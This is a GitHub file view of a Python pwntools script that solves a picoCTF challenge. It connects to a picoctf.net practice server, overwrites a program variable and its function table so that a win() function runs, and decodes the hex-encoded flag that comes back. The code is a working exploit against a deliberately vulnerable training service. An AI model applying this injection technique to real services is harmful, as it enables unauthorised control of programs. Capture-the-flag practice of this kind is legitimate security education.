-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
53 lines (41 loc) · 1.51 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import argparse
from pwn import *
def get_port():
parser = argparse.ArgumentParser()
parser.add_argument("port", help="The netcat port")
input = parser.parse_args()
return input.port
def send_command(conn, command):
conn.sendline(command)
response = conn.recv()
return response.decode("utf-8")
def get_flag(conn):
# create a variable to store the function win()
win_str = '"win" + "\\x28" + "\\x29"'
send_command(conn, "3")
send_command(conn, "flag")
send_command(conn, win_str)
# modify the func_table variable to store a new function (win) in the function table
new_func_table = "'win read_variable write_variable getRandomNumber '" # 128 bytes
send_command(conn, "3")
send_command(conn, "func_table")
send_command(conn, new_func_table)
# print the table to execute the win() function
table = send_command(conn, "1")
# decode the flag in hexadecimal form to raw string
hex_string = str(table.replace("==>", ""))
cleaned_hex_string = hex_string.replace("0x", "").replace(" ", "")
byte_data = bytes.fromhex(cleaned_hex_string)
decoded_string = byte_data.decode('utf-8')
return decoded_string
if __name__ == "__main__":
server = 'saturn.picoctf.net'
port = get_port()
conn = remote(server, port)
try:
flag = get_flag(conn)
print("-" * 50)
print(f"Flag: {flag}")
print("-" * 50)
finally:
conn.close()